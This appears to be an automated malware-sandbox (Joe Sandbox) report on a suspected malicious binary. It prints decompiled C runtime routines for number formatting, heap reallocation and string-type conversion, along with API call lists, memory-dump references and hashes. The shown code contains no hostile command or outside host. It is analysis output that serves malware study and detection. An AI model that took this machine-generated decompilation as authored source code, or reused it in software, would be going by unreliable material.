      								 *_t108 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0xbc))))));
      							} else {
      								 *_t108 = 0;
      							}
      							_t109 =  *_t203;
      							_t172 = _t203[1] & 0x000fffff;
      							__eflags = _t172;
      							_v12 = _t172;
      							if(_t172 > 0) {
      								L34:
      								_v16 = 0;
      								_v12 = 0xf0000;
      								do {
      									__eflags = _a16;
      									if(_a16 <= 0) {
      										break;
      									}
      									_t137 = E004121F0( *_t203 & _v16, _v8, _t203[1] & _v12 & 0x000fffff) + 0x00000030 & 0x0000ffff;
      									__eflags = _t137 - 0x39;
      									if(_t137 > 0x39) {
      										_t137 = _t137 + _t154;
      										__eflags = _t137;
      									}
      									_t180 = _v12;
      									_v8 = _v8 - 4;
      									 *_t210 = _t137;
      									_t210 = _t210 + 1;
      									_a16 = _a16 - 1;
      									__eflags = _v8;
      									_v16 = (_t180 << 0x00000020 | _v16) >> 4;
      									_v12 = _t180 >> 4;
      								} while (_v8 >= 0);
      								__eflags = _v8;
      								if(_v8 < 0) {
      									goto L50;
      								}
      								_t131 = E004121F0( *_t203 & _v16, _v8, _t203[1] & _v12 & 0x000fffff);
      								__eflags = _t131 - 8;
      								if(_t131 <= 8) {
      									goto L50;
      								}
      								_t132 = _t210 - 1;
      								while(1) {
      									_t176 =  *_t132;
      									__eflags = _t176 - 0x66;
      									if(_t176 == 0x66) {
      										goto L44;
      									}
      									__eflags = _t176 - 0x46;
      									if(_t176 != 0x46) {
      										__eflags = _t132 - _a8;
      										if(_t132 == _a8) {
      											_t72 = _t132 - 1;
      											 *_t72 =  *(_t132 - 1) + 1;
      											__eflags =  *_t72;
      										} else {
      											_t177 =  *_t132;
      											__eflags = _t177 - 0x39;
      											if(_t177 != 0x39) {
      												 *_t132 = _t177 + 1;
      											} else {
      												 *_t132 = _t154 + 0x3a;
      											}
      										}
      										goto L50;
      									}
      									L44:
      									 *_t132 = 0x30;
      									_t132 = _t132 - 1;
      								}
      							} else {
      								__eflags = _t109;
      								if(_t109 <= 0) {
      									L50:
      									__eflags = _a16;
      									if(_a16 > 0) {
      										E0040FE20(_t203, _t210, 0x30, _a16);
      										_t210 = _t210 + _a16;
      										__eflags = _t210;
      									}
      									_t110 = _a8;
      									__eflags =  *_t110;
      									if( *_t110 == 0) {
      										_t210 = _t110;
      									}
      									__eflags = _a20;
      									 *_t210 = ((_t110 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
      									_t194 = _t203[1];
      									_t211 = _t210 + 1;
      									_t116 = E004121F0( *_t203, 0x34, _t194);
      									_t195 = _t194 & 0;
      									_t118 = (_t116 & 0x000007ff) - _v24;
      									__eflags = _t118;
      									_push(0);
      									_pop(0x3e8);
      									asm("sbb edx, ecx");
      									if(__eflags < 0) {
      										L58:
      										 *_t211 = 0x2d;
      										_t212 = _t211 + 1;
      										__eflags = _t212;
      										_t118 =  ~_t118;
      										asm("adc edx, ebx");
      										_t195 =  ~_t195;
      										goto L59;
      									} else {
      										if(__eflags > 0) {
      											L57:
      											 *_t211 = 0x2b;
      											_t212 = _t211 + 1;
      											L59:
      											__eflags = _t195;
      											_t204 = _t212;
      											 *_t212 = 0x30;
      											if(__eflags < 0) {
      												L63:
      												__eflags = _t195;
      												if(__eflags < 0) {
      													L67:
      													__eflags = _t212 - _t204;
      													if(_t212 != _t204) {
      														L71:
      														_push(0);
      														_push(0xa);
      														_push(_t195);
      														_push(_t118);
      														 *_t212 = E00412110() + 0x30;
      														_v20 = _t195;
      														_t212 = _t212 + 1;
      														__eflags = _t212;
      														_t118 = 0x3e8;
      														_v20 = 0;
      														L72:
      														_t121 = _t118 + 0x30;
      														__eflags = _t121;
      														 *_t212 = _t121;
      														 *(_t212 + 1) = 0;
      														L73:
      														__eflags = _v28;
      														if(_v28 != 0) {
      															_t123 = _v32;
      															_t90 = _t123 + 0x70;
      															 *_t90 =  *(_t123 + 0x70) & 0xfffffffd;
      															__eflags =  *_t90;
      														}
      														_t122 = 0;
      														__eflags = 0;
      														L76:
      														return _t122;
      													}
      													__eflags = _t195;
      													if(__eflags < 0) {
      														goto L72;
      													}
      													if(__eflags > 0) {
      														goto L71;
      													}
      													__eflags = _t118 - 0xa;
      													if(_t118 < 0xa) {
      														goto L72;
      													}
      													goto L71;
      												}
      												if(__eflags > 0) {
      													L66:
      													_push(0);
      													_push(0x64);
      													_push(_t195);
      													_push(_t118);
      													 *_t212 = E00412110() + 0x30;
      													_v20 = _t195;
      													_t212 = _t212 + 1;
      													__eflags = _t212;
      													_t118 = 0x3e8;
      													_t195 = 0;
      													goto L67;
      												}
      												__eflags = _t118 - 0x64;
      												if(_t118 < 0x64) {
      													goto L67;
      												}
      												goto L66;
      											}
      											if(__eflags > 0) {
      												L62:
      												_push(0);
      												_push(0x3e8);
      												_push(_t195);
      												_push(_t118);
      												 *_t212 = E00412110() + 0x30;
      												_t212 = _t212 + 1;
      												__eflags = _t212 - _t204;
      												_v20 = _t195;
      												_t118 = 0x3e8;
      												_t195 = 0;
      												if(_t212 != _t204) {
      													goto L66;
      												}
      												goto L63;
      											}
      											__eflags = _t118 - 0x3e8;
      											if(_t118 < 0x3e8) {
      												goto L63;
      											}
      											goto L62;
      										}
      										__eflags = _t118;
      										if(_t118 < 0) {
      											goto L58;
      										}
      										goto L57;
      									}
      								}
      								goto L34;
      							}
      						}
      						__eflags = 0;
      						if(0 != 0) {
      							goto L22;
      						}
      						_t142 = _a12;
      						__eflags = _t142 - 0xffffffff;
      						if(_t142 != 0xffffffff) {
      							_t143 = _t142 + 0xfffffffe;
      							__eflags = _t142 + 0xfffffffe;
      						} else {
      							_t143 = _t142;
      						}
      						_t158 = _t205 + 2;
      						_t122 = E0040DA58(_t203, _t158, _t143, _a16, 0);
      						__eflags = _t122;
      						if(_t122 == 0) {
      							__eflags =  *_t158 - 0x2d;
      							if( *_t158 == 0x2d) {
      								 *_t205 = 0x2d;
      								_t205 = _t205 + 1;
      								__eflags = _t205;
      							}
      							 *_t205 = 0x30;
      							__eflags = _a20;
      							 *(_t205 + 1) = ((_t122 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
      							_t148 = E00411870(_t162, _t205 + 2, 0x65);
      							__eflags = _t148;
      							_pop(_t185);
      							if(_t148 != 0) {
      								__eflags = _a20;
      								 *_t148 = ((_t185 & 0xffffff00 | _a20 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
      								 *((char*)(_t148 + 3)) = 0;
      							}
      							goto L73;
      						} else {
      							__eflags = _v28;
      							 *_t205 = 0;
      							if(_v28 != 0) {
      								 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
      							}
      							goto L76;
      						}
      					} else {
      						_t93 = E0040D198(__eflags);
      						_push(0x22);
      						L4:
      						_pop(_t206);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0);
      						 *_t93 = _t206;
      						E0040CB22(_t149, _t191, 0);
      						if(_v28 != 0) {
      							 *(_v32 + 0x70) =  *(_v32 + 0x70) & 0xfffffffd;
      						}
      						return _t206;
      					}
      				}
      				L3:
      				_t93 = E0040D198(_t220);
      				_push(0x16);
      				goto L4;
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: __alldvrm$__cftoa_strrchr
      • String ID: 0
      • API String ID: 4146837300-4108050209
      • Opcode ID: bb379f49618245c50236eee69d93a0d27f70e72541a829d4372d7485cdd14973
      • Instruction ID: 23c80e39a6094f56edf2e2e9f13ffced6d8a4fb1d28ba861214ab2868c064bb5
      • Opcode Fuzzy Hash: bb379f49618245c50236eee69d93a0d27f70e72541a829d4372d7485cdd14973
      • Instruction Fuzzy Hash: 90C10371D042469FEB159FA8C8817AEBBA0EF51304F24417FD891A73C1D3BC994AC79A
      APIs
      • GetLastError.KERNEL32 ref: 00413AF1
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
      • ___sbh_resize_block.LIBC ref: 00413960
      • RtlAllocateHeap.NTDLL(00000000,?), ref: 004139C6
        • Part of subcall function 0040E254: HeapFree.KERNEL32(00000000,00000000), ref: 0040E508
      • RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 00413A1D
      • GetLastError.KERNEL32 ref: 00413A64
      • RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 00413A9E
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocateErrorLast$Free$___sbh_resize_block
      • String ID:
      • API String ID: 4098171645-0
      • Opcode ID: 6ea157b72186a50ec11fff56a1ead13efffffec92ceb3ed8986761702809405c
      • Instruction ID: 9110507b3a0649f73c8a29543f7f928737e39a5a198da3b160725d8c481b4db1
      • Opcode Fuzzy Hash: 6ea157b72186a50ec11fff56a1ead13efffffec92ceb3ed8986761702809405c
      • Instruction Fuzzy Hash: 9D511A71D04215AACF217F669C44AEF7A28EF403A5B11452BF895A73D1EB3C4EC08B9D
      C-Code - Quality: 65%
      			E004138E9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				long _t26;
      				long _t27;
      				intOrPtr* _t29;
      				intOrPtr* _t33;
      				intOrPtr* _t37;
      				long _t39;
      				void* _t43;
      				long _t45;
      				long _t48;
      				long _t49;
      				long _t51;
      				long _t53;
      				void* _t57;
      				long _t70;
      				long _t73;
      				void* _t79;
      				void* _t80;
      
      				_push(0x10);
      				_push(0x418e20);
      				E0040D48C(__ebx, __edi, __esi);
      				_t57 =  *(_t79 + 8);
      				if(_t57 != 0) {
      					_t73 =  *(_t79 + 0xc);
      					__eflags = _t73;
      					if(__eflags != 0) {
      						__eflags =  *0x436be0 - 3;
      						if( *0x436be0 != 3) {
      							while(1) {
      								__eflags = _t73 - 0xffffffe0;
      								if(_t73 > 0xffffffe0) {
      									break;
      								}
      								__eflags = _t73;
      								if(_t73 == 0) {
      									_t73 = _t73 + 1;
      									__eflags = _t73;
      								}
      								_t26 = HeapReAlloc( *0x436214, 0, _t57, _t73);
      								_t70 = _t26;
      								__eflags = _t70;
      								if(_t70 != 0) {
      									L48:
      									_t27 = _t70;
      									goto L43;
      								} else {
      									__eflags =  *0x436530 - _t26;
      									if( *0x436530 == _t26) {
      										__eflags = _t70;
      										if(__eflags != 0) {
      											goto L48;
      										}
      										_t29 = E0040D198(__eflags);
      										L47:
      										 *_t29 = E0040D15D(GetLastError());
      										goto L48;
      									}
      									__eflags = E0040EF78(_t73);
      									if(__eflags == 0) {
      										_t33 = E0040D198(__eflags);
      										L30:
      										 *_t33 = E0040D15D(GetLastError());
      										goto L42;
      									}
      									continue;
      								}
      							}
      							L40:
      							E0040EF78(_t73);
      							_t37 = E0040D198(__eflags);
      							L41:
      							 *_t37 = 0xc;
      							goto L42;
      						} else {
      							goto L5;
      						}
      						while(1) {
      							L5:
      							 *(_t79 - 0x1c) = 0;
      							__eflags = _t73 - 0xffffffe0;
      							if(_t73 > 0xffffffe0) {
      								goto L40;
      							}
      							E0040D43F(_t57, 0, 4);
      							 *((intOrPtr*)(_t79 - 4)) = 0;
      							_t39 = E0040E229(_t57);
      							 *(_t79 - 0x20) = _t39;
      							__eflags = _t39;
      							if(_t39 == 0) {
      								L21:
      								 *((intOrPtr*)(_t79 - 4)) = 0xfffffffe;
      								E00413A2D();
      								__eflags =  *(_t79 - 0x20);
      								if( *(_t79 - 0x20) != 0) {
      									_t70 =  *(_t79 - 0x1c);
      								} else {
      									__eflags = _t73;
      									if(_t73 == 0) {
      										_t73 = _t73 + 1;
      										__eflags = _t73;
      									}
      									_t73 = _t73 + 0x0000000f & 0xfffffff0;
      									 *(_t79 + 0xc) = _t73;
      									_t70 = HeapReAlloc( *0x436214, 0, _t57, _t73);
      								}
      								__eflags = _t70;
      								if(_t70 != 0) {
      									goto L48;
      								} else {
      									__eflags =  *0x436530 - _t70;
      									if( *0x436530 == _t70) {
      										__eflags = _t70;
      										if(__eflags != 0) {
      											goto L48;
      										}
      										_t29 = E0040D198(__eflags);
      										__eflags =  *(_t79 - 0x20) - _t70;
      										if( *(_t79 - 0x20) == _t70) {
      											goto L47;
      										}
      										 *_t29 = 0xc;
      										goto L48;
      									}
      									__eflags = E0040EF78(_t73);
      									if(__eflags != 0) {
      										continue;
      									}
      									_t37 = E0040D198(__eflags);
      									__eflags =  *(_t79 - 0x20) - _t70;
      									if( *(_t79 - 0x20) != _t70) {
      										goto L41;
      									}
      									goto L30;
      								}
      							}
      							__eflags = _t73 -  *0x436bec; // 0x0
      							if(__eflags <= 0) {
      								_push(_t73);
      								_push(_t57);
      								_push(_t39);
      								_t48 = E0040E71E();
      								_t80 = _t80 + 0xc;
      								__eflags = _t48;
      								if(_t48 == 0) {
      									_push(_t73);
      									_t49 = E0040E9FD();
      									 *(_t79 - 0x1c) = _t49;
      									__eflags = _t49;
      									if(_t49 != 0) {
      										_t9 = _t57 - 4; // 0x983b
      										_t51 =  *_t9 - 1;
      										__eflags = _t51 - _t73;
      										if(_t51 >= _t73) {
      											_t51 = _t73;
      										}
      										E004125F0(_t57, 0, _t73,  *(_t79 - 0x1c), _t57, _t51);
      										_t53 = E0040E229(_t57);
      										 *(_t79 - 0x20) = _t53;
      										_push(_t57);
      										_push(_t53);
      										E0040E254();
      										_t80 = _t80 + 0x18;
      									}
      								} else {
      									 *(_t79 - 0x1c) = _t57;
      								}
      							}
      							__eflags =  *(_t79 - 0x1c);
      							if( *(_t79 - 0x1c) == 0) {
      								__eflags = _t73;
      								if(_t73 == 0) {
      									_t73 = 1;
      									__eflags = 1;
      									 *(_t79 + 0xc) = 1;
      								}
      								_t73 = _t73 + 0x0000000f & 0xfffffff0;
      								 *(_t79 + 0xc) = _t73;
      								_t43 = HeapAlloc( *0x436214, 0, _t73);
      								 *(_t79 - 0x1c) = _t43;
      								__eflags = _t43;
      								if(_t43 != 0) {
      									_t16 = _t57 - 4; // 0x983b
      									_t45 =  *_t16 - 1;
      									__eflags = _t45 - _t73;
      									if(_t45 >= _t73) {
      										_t45 = _t73;
      									}
      									E004125F0(_t57, 0, _t73,  *(_t79 - 0x1c), _t57, _t45);
      									_push(_t57);
      									_push( *(_t79 - 0x20));
      									E0040E254();
      									_t80 = _t80 + 0x14;
      								}
      							}
      							goto L21;
      						}
      						goto L40;
      					} else {
      						_push(_t57);
      						E00410D1A(_t57, __edi, _t73, __eflags);
      						L42:
      						_t27 = 0;
      						__eflags = 0;
      						goto L43;
      					}
      				} else {
      					_t27 = E0040C70A(_t57, __edx, __edi, __esi,  *(_t79 + 0xc));
      					L43:
      					return E0040D4D1(_t27);
      				}
      			}

      APIs
      • GetLastError.KERNEL32 ref: 00413AF1
        • Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
      • ___sbh_resize_block.LIBC ref: 00413960
      • HeapAlloc.KERNEL32(00000000,00000001,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1,00000004), ref: 004139C6
        • Part of subcall function 0040E254: VirtualFree.KERNEL32(?,00008000,00004000,00000000,00000000,00000001,00000000), ref: 0040E49B
        • Part of subcall function 0040E254: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E4F6
        • Part of subcall function 0040E254: HeapFree.KERNEL32(00000000,?), ref: 0040E508
      • HeapReAlloc.KERNEL32(00000000,00402D4A,00000001,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1), ref: 00413A1D
      • GetLastError.KERNEL32(00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1,00000004,00000002), ref: 00413A64
      • HeapReAlloc.KERNEL32(00000000,00402D4A,00000010,00418E20,00000010,00413B47,00000000,00000002,00000000,00411181,00000004,00000004,00000004,00000000,01D31728,00410FD1), ref: 00413A9E
        • Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocFree$ErrorLast$Virtual$CriticalEnterSection___sbh_resize_block
      • String ID:
      • API String ID: 1978709766-0
      • Opcode ID: 8932e8b575111653ec71cf9ba94abce5e38b70348878fdf5c1e24e45f7e095fa
      • Instruction ID: 9110507b3a0649f73c8a29543f7f928737e39a5a198da3b160725d8c481b4db1
      • Opcode Fuzzy Hash: 8932e8b575111653ec71cf9ba94abce5e38b70348878fdf5c1e24e45f7e095fa
      • Instruction Fuzzy Hash: 9D511A71D04215AACF217F669C44AEF7A28EF403A5B11452BF895A73D1EB3C4EC08B9D
      C-Code - Quality: 88%
      			E00412F38(intOrPtr* __ecx, intOrPtr __edx, int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, intOrPtr _a28) {
      				signed int _v8;
      				short _v12;
      				void* _v24;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t44;
      				intOrPtr _t46;
      				void* _t47;
      				short _t48;
      				short _t49;
      				int _t63;
      				short* _t67;
      				long _t73;
      				short* _t75;
      				intOrPtr _t76;
      				intOrPtr _t85;
      				intOrPtr* _t87;
      				short _t88;
      				intOrPtr _t89;
      				int _t90;
      				char* _t92;
      				intOrPtr _t93;
      				signed int _t97;
      				short* _t98;
      				void* _t106;
      
      				_t85 = __edx;
      				_push(__ecx);
      				_push(__ecx);
      				_t44 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t44 ^ _t97;
      				_t46 =  *0x436a08; // 0x1
      				_t75 = 0;
      				_t87 = __ecx;
      				if(_t46 != 0) {
      					L6:
      					__eflags = _t46 - 2;
      					if(_t46 == 2) {
      						L25:
      						_t92 = 0;
      						__eflags = _a24 - _t75;
      						if(_a24 == _t75) {
      							_a24 =  *((intOrPtr*)( *_t87 + 0x14));
      						}
      						__eflags = _a20 - _t75;
      						if(_a20 == _t75) {
      							_a20 =  *((intOrPtr*)( *_t87 + 4));
      						}
      						_t47 = E004134B0(_t75, _t85, _t87, _t92, _a24);
      						__eflags = _t47 - 0xffffffff;
      						if(_t47 != 0xffffffff) {
      							__eflags = _t47 - _a20;
      							if(_t47 == _a20) {
      								L34:
      								_t48 = GetStringTypeA(_a24, _a4, _a8, _a12, _a16);
      								__eflags = _t92 - _t75;
      								_t88 = _t48;
      								if(__eflags != 0) {
      									_push(_t92);
      									E00410D1A(_t75, _t88, _t92, __eflags);
      								}
      								_t49 = _t88;
      								goto L37;
      							}
      							_t92 = E004134F7(_t85, _a20, _t47, _a8,  &_a12, _t75, _t75);
      							__eflags = _t92 - _t75;
      							if(_t92 == _t75) {
      								goto L30;
      							}
      							_a8 = _t92;
      							goto L34;
      						} else {
      							L30:
      							_t49 = 0;
      							L37:
      							_pop(_t89);
      							_pop(_t93);
      							_pop(_t76);
      							return E0040FE9A(_t49, _t76, _v8 ^ _t97, _t85, _t89, _t93);
      						}
      					}
      					__eflags = _t46 - _t75;
      					if(_t46 == _t75) {
      						goto L25;
      					}
      					__eflags = _t46 - 1;
      					if(_t46 != 1) {
      						goto L30;
      					}
      					L9:
      					_v12 = _t75;
      					if(_a20 == _t75) {
      						_a20 =  *((intOrPtr*)( *_t87 + 4));
      					}
      					_t90 = MultiByteToWideChar(_a20, 1 + (0 | _a28 != _t75) * 8, _a8, _a12, _t75, _t75);
      					_t106 = _t90 - _t75;
      					if(_t106 == 0) {
      						goto L30;
      					} else {
      						if(_t106 <= 0 || _t90 > 0x7ffffff0) {
      							L21:
      							if(_t75 == 0) {
      								goto L30;
      							}
      							E0040FE20(_t90, _t75, 0, _t90 + _t90);
      							_t63 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t75, _t90);
      							if(_t63 != 0) {
      								_v12 = GetStringTypeW(_a4, _t75, _t63, _a16);
      							}
      							E0041083E(_t75);
      							_t49 = _v12;
      							goto L37;
      						} else {
      							_t16 = _t90 + 8; // 0x8
      							_t66 = _t90 + _t16;
      							if(_t90 + _t16 > 0x400) {
      								_t67 = E0040C70A(_t75, _t85, _t90, MultiByteToWideChar, _t66);
      								__eflags = _t67 - _t75;
      								if(_t67 == _t75) {
      									L20:
      									_t75 = _t67;
      									goto L21;
      								}
      								 *_t67 = 0xdddd;
      								L19:
      								_t67 =  &(_t67[4]);
      								goto L20;
      							}
      							E004136B0(_t66);
      							_t67 = _t98;
      							if(_t67 == _t75) {
      								goto L20;
      							}
      							 *_t67 = 0xcccc;
      							goto L19;
      						}
      					}
      				}
      				if(GetStringTypeW(1, 0x418118, 1,  &_v12) == 0) {
      					_t73 = GetLastError();
      					__eflags = _t73 - 0x78;
      					if(_t73 != 0x78) {
      						_t46 =  *0x436a08; // 0x1
      					} else {
      						_t46 = 2;
      						 *0x436a08 = _t46;
      					}
      					goto L6;
      				}
      				 *0x436a08 = 1;
      				goto L9;
      			}

      APIs
      • GetStringTypeW.KERNEL32(00000001,00418118,00000001,?,00415F7E,00415F7C,00000000,?,?,?,0041311E,00000001,?,00000000,?,?), ref: 00412F65
      • GetLastError.KERNEL32(?,0041311E,00000001,?,00000000,?,?,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000), ref: 00412F77
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00415F7E,00415F7C,00000000,?,?,?,0041311E,00000001,?,00000000), ref: 00412FDC
        • Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782
      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000,00000000), ref: 00413046
      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00413054
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2
      • GetStringTypeA.KERNEL32 ref: 004130C9
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
        • Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ByteCharMultiWide$InfoStringType$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
      • String ID:
      • API String ID: 3073855544-0
      • Opcode ID: 1668361eef3b64353d9da953a71926155548265248b80579629886da2d2c0dd3
      • Instruction ID: d46c18d8d68949bb4ae9f948932a194cea07ec9ef34beebbf33d215d183c743c
      • Opcode Fuzzy Hash: 1668361eef3b64353d9da953a71926155548265248b80579629886da2d2c0dd3
      • Instruction Fuzzy Hash: 70517C7150010AAFCF209F64DC819EF7FE9EB08355B20443AF905D6250D779DEE19BA8
      APIs
      • GetModuleFileNameA.KERNEL32(00000000,00436231,00000104), ref: 0040EE2E
        • Part of subcall function 00412282: LoadLibraryA.KERNEL32(004181B8), ref: 004122AF
      • GetStdHandle.KERNEL32(000000F4), ref: 0040EEFE
      • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040EF29
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: File$HandleLibraryLoadModuleNameWrite
      • String ID: ,eC$1bC
      • API String ID: 1792087469-1627168295
      • Opcode ID: fd434b84b08807869fccc5c1bf5ab6d9c2846566e93ed371bfdf31bc91bd7674
      • Instruction ID: 462586cc789323171f2c72c096ec468ac0dd215f58db3d8e5dcc44e6501676fe
      • Opcode Fuzzy Hash: fd434b84b08807869fccc5c1bf5ab6d9c2846566e93ed371bfdf31bc91bd7674
      • Instruction Fuzzy Hash: 253137B26442197AE62033279C86BBF364C9B15358F15053BFC08B02D3EA7E996140EE
      APIs
      • StrChrA.SHLWAPI(?,0000005F), ref: 002D170D
      • memcpy.NTDLL(?,?,?), ref: 002D1724
      • lstrcpy.KERNEL32(?), ref: 002D173B
        • Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
        • Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
        • Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411
        • Part of subcall function 002D26CC: SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
        • Part of subcall function 002D26CC: memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E
        • Part of subcall function 002D26CC: SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A
        • Part of subcall function 002D1660: lstrlen.KERNEL32(002DB2EC,?,?,?,002D1802,?,?,80000003,?,?,002DC7CF,80000003,00000000), ref: 002D168D
      • lstrcpy.KERNEL32(?,002DC6C2), ref: 002D180F
        • Part of subcall function 002D2668: SysAllocString.OLEAUT32(?), ref: 002D2682
        • Part of subcall function 002D2668: SysFreeString.OLEAUT32(00000000), ref: 002D26B9
